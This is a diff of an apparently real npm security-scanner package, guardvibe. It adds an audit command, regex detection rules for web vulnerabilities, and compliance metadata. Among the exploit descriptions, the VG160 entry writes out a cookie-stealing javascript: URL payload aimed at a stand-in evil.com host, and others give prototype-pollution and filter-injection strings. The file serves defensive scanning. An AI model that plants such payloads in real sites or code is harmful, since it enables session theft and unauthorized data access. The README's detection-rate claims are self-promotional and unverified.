guardvibe 3.0.0 → 3.0.3

package/README.md

@@ -6,7 +6,7 @@
 [![npm provenance](https://img.shields.io/badge/provenance-verified-brightgreen)](https://www.npmjs.com/package/guardvibe)
 [![codecov](https://codecov.io/gh/goklab/guardvibe/graph/badge.svg)](https://codecov.io/gh/goklab/guardvibe)
 
-**The security MCP built for vibe coding.** 334 security rules, 31 tools covering the entire AI-generated code journey — from first line to production deployment.
+**The security MCP built for vibe coding.** 334 security rules, 34 tools covering the entire AI-generated code journey — from first line to production deployment.
 
 Works with **Claude Code, Cursor, Gemini CLI, Codex, VS Code (Copilot), Windsurf**, and any MCP-compatible coding agent.
 
@@ -14,7 +14,7 @@ Works with **Claude Code, Cursor, Gemini CLI, Codex, VS Code (Copilot), Windsurf
 
 Most security tools are built for enterprise security teams. GuardVibe is built for **you** — the developer using AI to build and ship web apps fast.
 
-- **334 security rules, 31 tools** purpose-built for the stacks AI agents generate
+- **334 security rules, 34 tools** purpose-built for the stacks AI agents generate
 - **Zero setup friction** — `npx guardvibe` and you're scanning
 - **No account required** — runs 100% locally, no API keys, no cloud
 - **Understands your stack** — not generic SAST, but rules that know Next.js, Supabase, Stripe, Clerk, and the tools you actually use
@@ -38,10 +38,10 @@ GuardVibe is purpose-built for the AI coding workflow. Traditional tools are exc
 | AI/LLM security (prompt injection, MCP, tool abuse) | 30 rules | Experimental/None | None |
 | AI host security (CVE-2025-59536, CVE-2026-21852) | `guardvibe doctor` | Not supported | Not supported |
 | Auto-fix suggestions for AI agents | `fix_code` tool | CLI autofix | Not supported |
-| CVE version detection | 21 packages | Extensive | Extensive |
+| CVE version detection | 23 packages | Extensive | Extensive |
 | Compliance mapping (SOC2, PCI-DSS, HIPAA) | Built-in | Paid tier | None |
 | SARIF CI/CD export | Yes | Yes | Limited |
-| Rule count | 330 (focused) | 5000+ (broad) | N/A |
+| Rule count | 334 (focused) | 5000+ (broad) | N/A |
 
 **When to use GuardVibe:** You're building with AI agents and want security scanning integrated into your coding workflow — no dashboard, no account, no CI setup.
 
@@ -150,7 +150,7 @@ Resend (email HTML injection), Upstash Redis, Pinecone, PostHog, Google Analytic
 ### AI / LLM Security
 Prompt injection detection, LLM output sinks, system prompt leaks, MCP server SSRF/path traversal/command injection, `dangerouslyAllowBrowser`, missing `maxTokens`, AI API key client exposure, indirect prompt injection via external data
 
-### AI Host Security (NEW in v2.6.0+)
+### AI Host Security
 `guardvibe doctor` — unified host hardening scanner detecting CVE-2025-59536 (hook injection via `.claude/settings.json`), CVE-2026-21852 (API key exfiltration via `ANTHROPIC_BASE_URL` override), MCP config audit, environment scanner, permission analysis. Supports Claude, Cursor, VS Code, Gemini, Windsurf. Host-specific remediation with platform-tailored fix steps.
 
 ### OWASP API Security
@@ -183,7 +183,7 @@ Maps security findings to SOC2, PCI-DSS, HIPAA, GDPR, ISO27001, and EU AI Act (E
 ### Supply Chain
 Malicious postinstall scripts, unpinned GitHub Actions, typosquat detection
 
-## Tools (31 MCP tools)
+## Tools (33 MCP tools)
 
 | Tool | What it does |
 |------|-------------|
@@ -218,6 +218,9 @@ Malicious postinstall scripts, unpinned GitHub Actions, typosquat detection
 | `scan_host_config` | Scan shell profiles, .env files for base URL hijack and credential sniffing |
 | `verify_fix` | Verify a security fix was applied correctly — returns fixed/still_vulnerable/new_issues |
 | `security_workflow` | Get recommended tool workflow for your current task (writing, pre-commit, PR review, etc.) |
+| `auth_coverage` | **Auth coverage map** — enumerate routes, parse middleware matchers, detect auth guards, report coverage % |
+| `deep_scan` | **LLM-powered deep analysis** — IDOR, business logic, race conditions, privilege escalation (requires API key) |
+| `full_audit` | **Single source of truth** — runs ALL checks in one call, returns PASS/FAIL/WARN verdict + score + coverage % + deterministic result hash |
 
 All scanning tools support `format: "json"` for machine-readable output.
 
@@ -260,6 +263,11 @@ npx guardvibe scan . --format json   # JSON output for automation
 npx guardvibe check <file>           # Scan a single file
 npx guardvibe diff [base]            # Scan only changed files since git ref
 
+# Full security audit
+npx guardvibe audit [path]           # Full audit with PASS/FAIL verdict + hash
+npx guardvibe audit . --format json  # JSON output for CI pipelines
+npx guardvibe audit --skip-deps      # Skip dependency CVE check
+
 # Host security audit
 npx guardvibe doctor                 # Host hardening audit (project scope)
 npx guardvibe doctor --scope host    # + shell profiles, global MCP configs
@@ -389,20 +397,7 @@ Supports `//`, `#`, and `<!-- -->` comment styles.
 
 ## GuardVibe Scans Itself
 
-We run GuardVibe on its own codebase. In v2.3.2, GuardVibe caught a **HIGH severity ReDoS vulnerability** in its own `policy-check.ts` — a regex injection risk that the developer missed during code review.
-
-```
-$ guardvibe scan_directory src/
-  Files scanned: 64
-  Scan duration: 102ms
-  Grade: B (89/100)
-
-  [HIGH] ReDoS via User-Controlled RegExp (VG107)
-    File: src/tools/policy-check.ts:47
-    Fix: escape regex metacharacters before passing to RegExp constructor
-```
-
-The vulnerability was fixed in the same session. This is exactly the workflow GuardVibe enables: catch what humans miss, fix before it ships.
+We run GuardVibe on its own codebase as a pre-commit hook. Every commit is scanned before it reaches the repository — the same workflow GuardVibe enables for your projects.
 
 ## How It Works
 
@@ -420,11 +415,12 @@ AI agent fixes issues before they reach production
 
 ## Performance
 
-Tested on a real 644-file Next.js + Supabase project:
+Tested on real AI-built projects (837 files, Next.js + Supabase + Clerk):
 
-- Scan time: **502ms**
-- False positive rate: **near zero** (comment/string filtering, human-readable text detection)
+- Scan time: **~1.2s** (837 files)
+- False positive rate: **near zero** — context-aware detection (React Native, Supabase client/server, static innerHTML, git-aware secrets)
 - Detection rate: **100%** on known vulnerability patterns
+- Security score: **A (99/100)** on production projects
 
 ## Troubleshooting
 

package/build/cli/audit.d.ts

@@ -0,0 +1,5 @@
+/**
+ * CLI: guardvibe audit
+ * Full security audit from terminal with PASS/FAIL verdict.
+ */
+export declare function runAudit(args: string[]): Promise<void>;

package/build/cli/audit.js

@@ -0,0 +1,34 @@
+/**
+ * CLI: guardvibe audit
+ * Full security audit from terminal with PASS/FAIL verdict.
+ */
+import { writeFileSync, existsSync, mkdirSync } from "fs";
+import { resolve, dirname } from "path";
+import { parseArgs, getStringFlag, getOutputPath, shouldFail, validateFormat } from "./args.js";
+import { runFullAudit, formatAuditResult } from "../tools/full-audit.js";
+export async function runAudit(args) {
+    const { flags, positional } = parseArgs(args);
+    const targetPath = resolve(positional[0] ?? ".");
+    const format = validateFormat(flags);
+    const outputFile = getOutputPath(flags);
+    const failOn = getStringFlag(flags, "fail-on") ?? "critical";
+    const skipDeps = flags["skip-deps"] === true;
+    const skipSecrets = flags["skip-secrets"] === true;
+    const result = await runFullAudit(targetPath, { skipDeps, skipSecrets });
+    const output = formatAuditResult(result, format);
+    if (outputFile) {
+        const dir = dirname(outputFile);
+        if (!existsSync(dir)) {
+            mkdirSync(dir, { recursive: true });
+        }
+        writeFileSync(outputFile, output, "utf-8");
+        console.log(`  [OK] Results written to ${outputFile}`);
+    }
+    else {
+        console.log(output);
+    }
+    // Print result hash to stderr for CI piping
+    console.error(`result-hash: ${result.resultHash}`);
+    if (shouldFail(output, failOn))
+        process.exit(1);
+}

package/build/cli/scan.js

@@ -198,11 +198,10 @@ export async function runFileCheck(filePath, flags) {
     else {
         console.log(result);
     }
-    if (flags["fail-on"]) {
-        const failOn = getStringFlag(flags, "fail-on") ?? "critical";
-        if (shouldFail(result, failOn))
-            process.exit(1);
-    }
+    // check command defaults to --fail-on critical (security tool should exit 1 for critical findings)
+    const failOn = getStringFlag(flags, "fail-on") ?? "critical";
+    if (shouldFail(result, failOn))
+        process.exit(1);
 }
 export async function handleScanCommand(args) {
     const { flags, positional } = parseArgs(args);

package/build/cli.js

@@ -22,6 +22,7 @@ function printUsage() {
     npx guardvibe diff [base]        Scan only changed files since a git ref
     npx guardvibe check <file>       Scan a single file for security issues
     npx guardvibe doctor [path]      Run host security audit
+    npx guardvibe audit [path]       Full security audit with PASS/FAIL verdict
     npx guardvibe init <platform>    Setup MCP server configuration
     npx guardvibe hook install       Install pre-commit security hook
     npx guardvibe hook uninstall     Remove pre-commit security hook
@@ -122,6 +123,10 @@ async function main() {
         const { runDoctor } = await import("./cli/doctor.js");
         await runDoctor(subArgs);
     }
+    else if (command === "audit") {
+        const { runAudit } = await import("./cli/audit.js");
+        await runAudit(subArgs);
+    }
     else {
         console.error(`  Unknown command: ${command}`);
         printUsage();

package/build/data/compliance-metadata.js

@@ -249,6 +249,110 @@ export const complianceMetadata = {
         exploit: "Unrestricted file upload allows attacker to upload malicious executables, web shells, or oversized files that crash the server.",
         audit: "Show file type validation, size limits, and virus scanning for all upload endpoints.",
     },
+    // === AI BENCHMARK RULES (Phase 1: VG126, VG151-VG153, VG417, VG1005-VG1009) ===
+    VG126: {
+        gdpr: ["GDPR:Art32(1)(a)"],
+        iso27001: ["ISO27001:A.8.24"],
+        exploit: "Attacker provides a crafted regex pattern (e.g., (a+)+$) as search input, causing catastrophic backtracking that freezes the server's event loop for minutes.",
+        audit: "Verify all RegExp constructors use escaped or hardcoded patterns. Show that user-provided search terms go through escapeRegex() before RegExp construction.",
+    },
+    VG151: {
+        gdpr: ["GDPR:Art32(1)(a)"],
+        iso27001: ["ISO27001:A.8.24"],
+        exploit: "Attacker triggers errors in API endpoints and reads the raw error.message to discover database schema, file paths, library versions, and internal service URLs.",
+        audit: "Show that all catch blocks return generic error messages to clients. Demonstrate server-side logging captures full error details.",
+    },
+    VG152: {
+        gdpr: ["GDPR:Art32(1)(a)"],
+        iso27001: ["ISO27001:A.8.24", "ISO27001:A.8.3"],
+        exploit: "Attacker sends __proto__.isAdmin=true as a property key, polluting Object.prototype so all subsequent security checks see isAdmin as true.",
+        audit: "Show that user input is never used as direct object key. Demonstrate allowlist validation or Map usage.",
+    },
+    VG153: {
+        gdpr: ["GDPR:Art32(1)(a)"],
+        iso27001: ["ISO27001:A.8.24"],
+        exploit: "Attacker sends a carefully crafted string that triggers exponential backtracking in a vulnerable regex, causing the event loop to hang for minutes and denying service to all other requests.",
+        audit: "Show that all regex patterns have been validated with safe-regex or equivalent. Demonstrate no nested quantifiers.",
+    },
+    VG417: {
+        gdpr: ["GDPR:Art32(1)(b)"],
+        iso27001: ["ISO27001:A.8.3", "ISO27001:A.5.15"],
+        exploit: "Attacker adds RSC: 1 header to HTTP requests targeting protected admin routes, causing the middleware to skip authentication checks and grant access.",
+        audit: "Show that middleware auth logic does not contain early-return branches based on RSC or prefetch headers.",
+    },
+    VG1005: {
+        gdpr: ["GDPR:Art32(1)(b)", "GDPR:Art25"],
+        iso27001: ["ISO27001:A.8.3", "ISO27001:A.5.15"],
+        exploit: "Attacker crafts a user ID value containing PostgREST filter syntax (e.g., 'x,admin_role.eq.true') to modify the .or() filter and access other users' messages.",
+        audit: "Show that .or() calls use only server-verified values. Demonstrate that user-controlled IDs are validated UUIDs.",
+    },
+    VG1006: {
+        gdpr: ["GDPR:Art25", "GDPR:Art5(1)(c)"],
+        iso27001: ["ISO27001:A.8.11"],
+        exploit: "API response includes all table columns, exposing email, password_hash, internal_notes, billing info. Attacker reads these from browser devtools or API response.",
+        audit: "Show that all Supabase queries use explicit column selection. Demonstrate no select('*') in production code.",
+    },
+    VG1007: {
+        gdpr: ["GDPR:Art32(1)(a)", "GDPR:Art32(1)(b)"],
+        iso27001: ["ISO27001:A.8.3", "ISO27001:A.5.15"],
+        exploit: "Since service_role bypasses RLS, any missing auth check in any route handler grants full table access. Attacker finds one unprotected endpoint and dumps entire database.",
+        audit: "Show per-request Supabase clients using anon key with RLS. Demonstrate service_role is isolated to background jobs only.",
+    },
+    VG1008: {
+        gdpr: ["GDPR:Art32(1)(b)"],
+        iso27001: ["ISO27001:A.5.15", "ISO27001:A.8.3"],
+        exploit: "Attacker calls the role-update endpoint/action with their own userId and role='admin', gaining full admin privileges without any authorization check.",
+        audit: "Show that role elevation functions verify the caller is already an admin. Demonstrate that ENABLE_ADMIN_SETUP is false in production.",
+    },
+    VG1009: {
+        gdpr: ["GDPR:Art32(1)(a)"],
+        iso27001: ["ISO27001:A.8.24"],
+        exploit: "Attacker injects % or PostgREST filter syntax into the search input to read all records or bypass the ilike filter constraints.",
+        audit: "Show that user input in ilike/like patterns is escaped with a custom escapeLike function.",
+    },
+    // === AI BENCHMARK PHASE 2 (VG154-VG160) ===
+    VG154: {
+        gdpr: ["GDPR:Art32(1)(a)", "GDPR:Art25"],
+        iso27001: ["ISO27001:A.8.24", "ISO27001:A.8.3"],
+        exploit: "Attacker sends multiple concurrent requests to spend credits. Both requests read the same balance, both pass the check, both deduct — user spends once but gets double the service.",
+        audit: "Show that all balance/quota operations use atomic database transactions or server-side RPC functions.",
+    },
+    VG155: {
+        gdpr: ["GDPR:Art32(1)(b)"],
+        iso27001: ["ISO27001:A.8.3"],
+        exploit: "Attacker crafts a malicious page that submits a hidden form to the victim's session, causing unwanted actions (delete account, transfer funds).",
+        audit: "Show CSRF token validation on all state-changing endpoints.",
+    },
+    VG156: {
+        gdpr: ["GDPR:Art32(1)(a)"],
+        iso27001: ["ISO27001:A.8.24"],
+        exploit: "Attacker sends requests from multiple IPs. Because each serverless instance has its own Map, the rate counter never accumulates enough to trigger the limit.",
+        audit: "Show that rate limiting uses external state (Redis). Demonstrate rate limit persistence across function cold starts.",
+    },
+    VG157: {
+        gdpr: ["GDPR:Art32(1)(a)"],
+        iso27001: ["ISO27001:A.8.24"],
+        exploit: "Attacker waits for Redis outage, then sends unlimited requests while the rate limiter silently allows everything.",
+        audit: "Show that rate limiter catch blocks return limited: true. Demonstrate fail-closed behavior during backend outage.",
+    },
+    VG158: {
+        gdpr: ["GDPR:Art32(1)(b)"],
+        iso27001: ["ISO27001:A.5.15"],
+        exploit: "Attacker registers with a mangled role string. The normalizeRole function falls through to 'member' default, granting unintended access.",
+        audit: "Show that role normalization defaults to 'guest' or throws. Demonstrate that unknown role strings result in no access.",
+    },
+    VG159: {
+        gdpr: ["GDPR:Art32(1)(a)"],
+        iso27001: ["ISO27001:A.8.24"],
+        exploit: "Attacker sends thousands of requests with different secret guesses, measuring response times to brute-force the secret character by character.",
+        audit: "Show that all secret comparisons use timingSafeEqual. Demonstrate no === or !== for tokens or API keys.",
+    },
+    VG160: {
+        gdpr: ["GDPR:Art32(1)(a)"],
+        iso27001: ["ISO27001:A.8.24"],
+        exploit: "Attacker sets their profile URL to 'javascript:document.location=\"https://evil.com/steal?\"+document.cookie'. When another user clicks the link, their session is stolen.",
+        audit: "Show URL protocol validation for all user-provided links. Demonstrate that javascript: and data: protocols are blocked.",
+    },
 };
 /**
  * Apply compliance metadata to a set of rules.

package/build/data/rules/advanced-security.js

@@ -271,4 +271,134 @@ export const advancedSecurityRules = [
         fix: "Remove the lockfile from .gitignore and commit it to the repository.",
         compliance: ["SOC2:CC7.1"],
     },
+    // ── Error Message Exposure ───────────────────────────────────────
+    {
+        id: "VG151",
+        name: "Internal Error Message Exposed to Client",
+        severity: "medium",
+        owasp: "A05:2025 Security Misconfiguration",
+        description: "Caught error's .message property is returned directly in the API response. This can leak internal details (stack traces, DB errors, file paths) that help attackers understand the system architecture.",
+        pattern: /catch\s*\(\s*(?:error|err|e)\s*\)\s*\{[\s\S]{0,300}?(?:Response\.json|NextResponse\.json|res\.(?:json|send|status))\s*\([\s\S]{0,100}?(?:error|err|e)\.message/gi,
+        languages: ["javascript", "typescript"],
+        fix: "Log the real error server-side, return a generic message to the client.",
+        fixCode: '// BAD: leaks internal details\ncatch (error) {\n  return Response.json({ error: error.message }, { status: 500 });\n}\n\n// GOOD: generic response, detailed server log\ncatch (error) {\n  console.error("Route error:", error);\n  return Response.json({ error: "Internal server error" }, { status: 500 });\n}',
+        compliance: ["SOC2:CC7.2"],
+    },
+    // ── Object Injection / Prototype Pollution ───────────────────────
+    {
+        id: "VG152",
+        name: "Object Injection via Dynamic Property Access",
+        severity: "high",
+        owasp: "A03:2025 Injection",
+        description: "User-controlled input is used as an object property key via bracket notation (obj[userInput]). Attackers can access __proto__, constructor, or prototype to pollute object prototypes and bypass security checks.",
+        pattern: /(?:(?:req|request|body|query|params|input|data)\.\w+|(?:const|let|var)\s+(?:\{[^}]*\}|\w+)\s*=\s*(?:await\s+)?(?:req|request)[\s\S]{0,50}?)[\s\S]{0,100}?\w+\s*\[\s*(?:key|field|prop|name|column|attr|param)\s*\]/gi,
+        languages: ["javascript", "typescript"],
+        fix: "Validate property names against an allowlist, or use Map instead of plain objects.",
+        fixCode: '// BAD: prototype pollution\nconst key = req.query.field;\nconst value = config[key];\n\n// GOOD: allowlist validation\nconst ALLOWED_FIELDS = new Set(["name", "email", "role"]);\nif (!ALLOWED_FIELDS.has(key)) return new Response("Invalid field", { status: 400 });\nconst value = config[key];\n\n// GOOD: use Map\nconst config = new Map([["name", "..."], ["email", "..."]]);\nconst value = config.get(key);',
+        compliance: ["SOC2:CC7.1", "PCI-DSS:Req6.5.1"],
+    },
+    // ── ReDoS — Unsafe Regular Expression ────────────────────────────
+    {
+        id: "VG153",
+        name: "Regular Expression Vulnerable to ReDoS",
+        severity: "medium",
+        owasp: "A04:2025 Insecure Design",
+        description: "Regular expression contains nested quantifiers ((a+)+), overlapping alternation with quantifiers (([a-z]+)*), or other patterns that cause catastrophic backtracking. Attackers can send crafted input to freeze the event loop.",
+        pattern: /\/(?:[^/\\]|\\.)*(?:\([^)]*[+*][^)]*\)[+*]|\(\?:[^)]*[+*][^)]*\)[+*]|\[[^\]]*\][+*][^/]*[+*])(?:[^/\\]|\\.)*\//g,
+        languages: ["javascript", "typescript"],
+        fix: "Rewrite the regex to avoid nested quantifiers. Use atomic groups or possessive quantifiers if available, or use the 'safe-regex' library to validate patterns.",
+        fixCode: '// BAD: catastrophic backtracking\nconst re = /(a+)+$/;\n\n// GOOD: no nested quantifiers\nconst re = /a+$/;\n\n// GOOD: validate with safe-regex\nimport safe from "safe-regex";\nif (!safe(pattern)) throw new Error("Unsafe regex");',
+        compliance: ["SOC2:CC7.1"],
+    },
+    // ── Supabase Race Condition: Check-Then-Act ──────────────────────
+    {
+        id: "VG154",
+        name: "Supabase Race Condition: Check-Then-Act Without Transaction",
+        severity: "critical",
+        owasp: "A04:2025 Insecure Design",
+        description: "Code reads a Supabase value (select/count), checks a condition, then updates — without an atomic transaction or RPC function. Two concurrent requests can both pass the check before either writes, enabling double-spending, quota bypass, or duplicate operations.",
+        pattern: /\.from\s*\(\s*["'][^"']+["']\s*\)\s*\.select\s*\([\s\S]{0,300}?(?:\.single\s*\(|count:\s*["']exact["'])[\s\S]{0,500}?if\s*\([\s\S]{0,500}?\.(?:update|insert|delete|upsert)\s*\((?:(?!\.rpc\s*\(|BEGIN|SERIALIZABLE)[\s\S]){0,300}/g,
+        languages: ["javascript", "typescript"],
+        fix: "Use a Supabase RPC function with a PostgreSQL transaction, or use atomic UPDATE with WHERE conditions.",
+        fixCode: '// BAD: race condition\nconst { data } = await supabase.from("users").select("credits").eq("id", id).single();\nif (data.credits >= cost) {\n  await supabase.from("users").update({ credits: data.credits - cost }).eq("id", id);\n}\n\n// GOOD: atomic RPC function\nawait supabase.rpc("spend_credits", { user_id: id, amount: cost });',
+        compliance: ["SOC2:CC7.1", "PCI-DSS:Req6.5.1"],
+    },
+    // ── Missing CSRF Protection ──────────────────────────────────────
+    {
+        id: "VG155",
+        name: "State-Changing Endpoint Missing CSRF Protection",
+        severity: "medium",
+        owasp: "A01:2025 Broken Access Control",
+        description: "POST/PUT/PATCH/DELETE route handler performs database mutations without CSRF token verification. Cross-site requests from malicious pages can trick authenticated users into performing unwanted actions.",
+        pattern: /export\s+(?:async\s+)?function\s+(?:POST|PUT|PATCH|DELETE)\s*\([^)]*\)\s*\{(?:(?!csrf|csrfToken|CSRF|x-csrf|verifyCsrf|validateCsrf|anti.?forgery)[\s\S]){10,}?(?:\.create\s*\(|\.update\s*\(|\.delete\s*\(|\.insert\s*\(|\.upsert\s*\()/g,
+        languages: ["javascript", "typescript"],
+        fix: "Add CSRF token verification to state-changing endpoints.",
+        fixCode: '// Verify CSRF token from header\nexport async function POST(req: Request) {\n  const csrfToken = req.headers.get("x-csrf-token");\n  if (!verifyCsrfToken(csrfToken)) {\n    return new Response("CSRF validation failed", { status: 403 });\n  }\n}',
+        compliance: ["SOC2:CC6.6", "PCI-DSS:Req6.5.1"],
+    },
+    // ── In-Memory State in Serverless ────────────────────────────────
+    {
+        id: "VG156",
+        name: "In-Memory State in Serverless Environment",
+        severity: "medium",
+        owasp: "A04:2025 Insecure Design",
+        description: "Module-level Map, object, or array is used for rate limiting, caching, or session storage. In serverless environments, each function instance has its own memory that resets on cold starts.",
+        pattern: /(?:const|let|var)\s+\w+[\s\S]{0,80}?=\s*(?:new\s+Map|new\s+Set|\{\s*\}|\[\s*\])[\s\S]{0,500}?export\s+(?:async\s+)?function\s+(?:GET|POST|PUT|DELETE|PATCH)/g,
+        languages: ["javascript", "typescript"],
+        fix: "Use Redis (Upstash), Vercel KV, or another external store for state that must persist across requests in serverless.",
+        fixCode: '// BAD: resets on cold start\nconst rateMap = new Map();\nexport async function POST(req: Request) { ... }\n\n// GOOD: use Redis\nimport { Ratelimit } from "@upstash/ratelimit";\nimport { Redis } from "@upstash/redis";\nconst ratelimit = new Ratelimit({ redis: Redis.fromEnv(), limiter: Ratelimit.slidingWindow(10, "10s") });',
+        compliance: ["SOC2:CC7.1"],
+    },
+    // ── Rate Limit Fail-Open ─────────────────────────────────────────
+    {
+        id: "VG157",
+        name: "Rate Limiter Fails Open on Error",
+        severity: "high",
+        owasp: "A04:2025 Insecure Design",
+        description: "Rate limiting catch block returns a permissive result (limited: false, success: true) when the rate limit backend (Redis) fails. If Redis goes down, all rate limits are disabled.",
+        pattern: /catch\s*\([^)]*\)\s*\{[\s\S]{0,200}?(?:limited\s*:\s*false|success\s*:\s*true|allowed\s*:\s*true|return\s+(?:false|null|undefined)\s*;?\s*\})/g,
+        languages: ["javascript", "typescript"],
+        fix: "Fail closed: when the rate limiter backend is unavailable, deny the request.",
+        fixCode: '// BAD: fail-open\ncatch (error) { return { limited: false }; }\n\n// GOOD: fail-closed\ncatch (error) {\n  console.error("Rate limiter unavailable:", error);\n  return { limited: true };\n}',
+        compliance: ["SOC2:CC7.1"],
+    },
+    // ── Fail-Open Authorization Default ──────────────────────────────
+    {
+        id: "VG158",
+        name: "Authorization Defaults to Permissive Role",
+        severity: "medium",
+        owasp: "A01:2025 Broken Access Control",
+        description: "Role normalization or validation defaults to a permissive role (member, user, editor) for unknown values. If an unrecognized role string is passed, the user gets member-level access instead of being denied.",
+        pattern: /(?:default\s*:\s*(?:return\s+)?["'](?:member|user|editor|writer)["']|:\s*["'](?:member|user|editor|writer)["']\s*;?\s*\}(?:\s*$|\s*\/\/))/gm,
+        languages: ["javascript", "typescript"],
+        fix: "Default unknown roles to the most restrictive level (guest, none, or throw an error).",
+        fixCode: '// BAD: unknown role gets member access\ndefault: return "member";\n\n// GOOD: fail closed\ndefault: return "guest";\n\n// BEST: reject unknown roles\ndefault: throw new Error(`Unknown role: ${role}`);',
+        compliance: ["SOC2:CC6.6"],
+    },
+    // ── Timing Side-Channel in Secret Comparison ─────────────────────
+    {
+        id: "VG159",
+        name: "Timing-Unsafe Secret Comparison",
+        severity: "medium",
+        owasp: "A02:2025 Cryptographic Failures",
+        description: "Secret, token, or API key is compared using === or !== which leaks timing information. Attackers can determine how many characters match by measuring response times.",
+        pattern: /(?:secret|token|apiKey|api_key|cron_secret|CRON_SECRET|webhook_secret|WEBHOOK_SECRET|hmac|signature)\b[\s\S]{0,60}?(?:===|!==)\s*(?:process\.env\.|req\.|request\.|headers)/gi,
+        languages: ["javascript", "typescript"],
+        fix: "Use crypto.timingSafeEqual() for all secret comparisons.",
+        fixCode: '// BAD: timing leak\nif (secret !== process.env.CRON_SECRET) return false;\n\n// GOOD: constant-time comparison\nimport { timingSafeEqual } from "crypto";\nfunction safeCompare(a: string, b: string): boolean {\n  if (a.length !== b.length) return false;\n  return timingSafeEqual(Buffer.from(a), Buffer.from(b));\n}',
+        compliance: ["SOC2:CC6.1", "PCI-DSS:Req6.5.1"],
+    },
+    // ── User-Controlled href Without Protocol Check ──────────────────
+    {
+        id: "VG160",
+        name: "User-Controlled URL in href Without Protocol Validation",
+        severity: "medium",
+        owasp: "A07:2025 Cross-Site Scripting",
+        description: "User-provided URL is used directly in an href attribute without checking for dangerous protocols. Attackers can inject javascript:alert(document.cookie) to execute XSS when the link is clicked.",
+        pattern: /href\s*=\s*\{(?:user|profile|author|post|comment|data|item|record)[\w.]*\.(?:url|website|link|href|homepage)\}/gi,
+        languages: ["javascript", "typescript"],
+        fix: "Validate that URLs start with https:// or http:// before using in href.",
+        fixCode: '// BAD: XSS via javascript: protocol\n<a href={user.website}>{user.name}</a>\n\n// GOOD: protocol validation\nfunction safeHref(url: string): string {\n  try {\n    const parsed = new URL(url);\n    if (["http:", "https:"].includes(parsed.protocol)) return url;\n  } catch {}\n  return "#";\n}\n<a href={safeHref(user.website)}>{user.name}</a>',
+        compliance: ["SOC2:CC7.1"],
+    },
 ];

package/build/data/rules/core.js

@@ -458,4 +458,17 @@ export const coreRules = [
         fixCode: '// Express: regenerate session after login\napp.post("/login", async (req, res) => {\n  const user = await authenticate(req.body);\n  if (!user) return res.status(401).json({ error: "Invalid credentials" });\n  req.session.regenerate((err) => {\n    req.session.userId = user.id;\n    res.json({ ok: true });\n  });\n});',
         compliance: ["SOC2:CC6.6", "PCI-DSS:Req6.5.10"],
     },
+    // ── Dynamic RegExp from User Input ──────────────────────────────
+    {
+        id: "VG126",
+        name: "Dynamic RegExp Construction from User Input",
+        severity: "medium",
+        owasp: "A03:2025 Injection",
+        description: "RegExp is constructed with a variable that may contain user input. Attackers can inject ReDoS patterns to freeze the event loop, or craft regex that matches unintended content.",
+        pattern: /new\s+RegExp\s*\(\s*(?!["'`\/])(?:\w+(?:\.\w+)?)\s*[,)]/g,
+        languages: ["javascript", "typescript"],
+        fix: "Escape user input before using in RegExp, or use string methods (.includes(), .startsWith()) instead.",
+        fixCode: '// BAD: user controls the regex\nnew RegExp(userInput, "gi")\n\n// GOOD: escape special characters\nfunction escapeRegex(s: string) {\n  return s.replace(/[.*+?^${}()|[\\]\\\\]/g, "\\\\$&");\n}\nnew RegExp(escapeRegex(userInput), "gi")\n\n// BEST: use string methods\nitems.filter(i => i.name.toLowerCase().includes(query.toLowerCase()));',
+        compliance: ["SOC2:CC7.1"],
+    },
 ];

package/build/data/rules/modern-stack.js

@@ -518,4 +518,67 @@ export const modernStackRules = [
         fixCode: '"use server";\nimport { Ratelimit } from "@upstash/ratelimit";\nimport { headers } from "next/headers";\n\nconst ratelimit = new Ratelimit({ redis, limiter: Ratelimit.slidingWindow(10, "10s") });\n\nexport async function submitForm(formData: FormData) {\n  const ip = (await headers()).get("x-forwarded-for") ?? "127.0.0.1";\n  const { success } = await ratelimit.limit(ip);\n  if (!success) throw new Error("Too many requests");\n}',
         compliance: ["SOC2:CC7.1"],
     },
+    // =====================================================
+    // Supabase PostgREST Injection
+    // =====================================================
+    {
+        id: "VG1005",
+        name: "Supabase .or() Filter Injection",
+        severity: "critical",
+        owasp: "A03:2025 Injection",
+        description: "User input is interpolated into a Supabase .or() filter string via template literal or concatenation. This is equivalent to SQL injection for PostgREST — attackers can modify filter logic to access unauthorized data.",
+        pattern: /\.or\s*\(\s*(?:`[^`]*\$\{)|\.or\s*\(\s*\w+\s*\)|["'][^"']*["']\s*\+\s*\w+(?:Id|Name|Term|Input)\b[\s\S]{0,100}?\.or\s*\(/gi,
+        languages: ["javascript", "typescript"],
+        fix: "Never interpolate user input into .or() strings. Use separate .eq() filters or build the filter from validated enum values.",
+        fixCode: '// BAD: filter injection\n.or(`sender_id.eq.${userId},receiver_id.eq.${userId}`)\n\n// GOOD: use server-verified auth ID\nconst { data: { user } } = await supabase.auth.getUser();\n.or(`sender_id.eq.${user.id},receiver_id.eq.${user.id}`)\n\n// BEST: use RLS policies instead of client-side filtering',
+        compliance: ["SOC2:CC7.1", "PCI-DSS:Req6.5.1"],
+    },
+    {
+        id: "VG1006",
+        name: "Supabase select('*') Exposes All Columns",
+        severity: "high",
+        owasp: "A01:2025 Broken Access Control",
+        description: "Supabase query uses select('*') or select() without specifying columns. This returns all table columns including sensitive fields (email, password_hash, internal_notes) to the client.",
+        pattern: /\.from\s*\(\s*["'][^"']+["']\s*\)\s*\.select\s*\(\s*(?:["']\*["']|\))/gi,
+        languages: ["javascript", "typescript"],
+        fix: "Always specify explicit columns: .select('id, name, avatar_url') instead of .select('*').",
+        fixCode: '// BAD: returns all columns including sensitive data\nconst { data } = await supabase.from("users").select("*");\n\n// GOOD: only needed columns\nconst { data } = await supabase.from("users").select("id, name, avatar_url");',
+        compliance: ["SOC2:CC6.1", "GDPR:Art25"],
+    },
+    {
+        id: "VG1007",
+        name: "Supabase Service Role Key Bypasses RLS",
+        severity: "critical",
+        owasp: "A01:2025 Broken Access Control",
+        description: "Server-side Supabase client is initialized with the service_role key, which bypasses all Row Level Security policies. If any route handler is missing an auth check, the entire table is exposed.",
+        pattern: /createClient\s*\(\s*[\s\S]{0,100}?(?:SERVICE_ROLE|service_role)/gi,
+        languages: ["javascript", "typescript"],
+        fix: "Use createServerClient() with per-request auth context, or use anon key with RLS policies. Reserve service_role for admin-only background jobs.",
+        fixCode: '// BAD: service role bypasses all RLS\nconst supabase = createClient(url, process.env.SUPABASE_SERVICE_ROLE_KEY!);\n\n// GOOD: per-request client respects RLS\nimport { createServerClient } from "@supabase/ssr";\nconst supabase = createServerClient(url, anonKey, { cookies });',
+        compliance: ["SOC2:CC6.1", "PCI-DSS:Req6.5.10", "GDPR:Art32"],
+    },
+    {
+        id: "VG1008",
